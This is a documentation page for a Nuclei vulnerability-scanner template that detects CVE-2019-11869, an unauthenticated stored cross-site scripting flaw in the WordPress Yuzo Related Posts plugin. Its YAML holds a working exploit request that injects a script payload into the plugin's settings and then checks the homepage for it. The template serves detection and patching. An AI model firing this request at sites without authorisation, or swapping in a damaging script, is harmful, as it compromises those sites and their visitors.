Skip to content
Nuclei Templates

WordPress Yuzo <5.12.94 - Cross-Site Scripting

ID: CVE-2019-11869

Severity: medium

Author: ganofins

Tags: cve,cve2019,wpscan,wordpress,wp-plugin,xss,yuzopro

Description

Section titled “Description”

WordPress Yuzo Related Posts plugin before 5.12.94 is vulnerable to cross-site scriptingbecause it mistakenly expects that is_admin() verifies that therequest comes from an admin user (it actually only verifies that therequest is for an admin page). An unauthenticated attacker can consequently injecta payload into the plugin settings, such as theyuzo_related_post_css_and_style setting.

YAML Source

Section titled “YAML Source”
id: CVE-2019-11869


info:
  name: WordPress Yuzo <5.12.94 - Cross-Site Scripting
  author: ganofins
  severity: medium
  description: |
    WordPress Yuzo Related Posts plugin before 5.12.94 is vulnerable to cross-site scripting
    because it mistakenly expects that is_admin() verifies that the
    request comes from an admin user (it actually only verifies that the
    request is for an admin page). An unauthenticated attacker can consequently inject
    a payload into the plugin settings, such as the
    yuzo_related_post_css_and_style setting.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Update to the latest version of the Yuzo plugin (5.12.94 or higher) to mitigate this vulnerability.
  reference:
    - https://www.wordfence.com/blog/2019/04/yuzo-related-posts-zero-day-vulnerability-exploited-in-the-wild
    - https://wpscan.com/vulnerability/9254
    - https://www.wordfence.com/blog/2019/04/yuzo-related-posts-zero-day-vulnerability-exploited-in-the-wild/
    - https://wpvulndb.com/vulnerabilities/9254
    - https://nvd.nist.gov/vuln/detail/CVE-2019-11869
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-11869
    cwe-id: CWE-79
    epss-score: 0.0018
    epss-percentile: 0.55101
    cpe: cpe:2.3:a:yuzopro:yuzo:5.12.94:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: yuzopro
    product: yuzo
    framework: wordpress
  tags: cve,cve2019,wpscan,wordpress,wp-plugin,xss,yuzopro


http:
  - raw:
      - |
        POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        yuzo_related_post_css_and_style=</style><script>alert(0);</script>
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "<script>alert(0);</script>")'


      - type: dsl
        dsl:
          - "contains(tolower(header_2), 'text/html')"
# digest: 4a0a00473045022100857a050c1fa3956feaeb086133625c727125d828913fb4c9876b7bae4ab3c1430220140fa98972900261bedf9280ae2d893f9d58c49ee4caa3b067db524b95285280:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-11869.yaml"

View on Github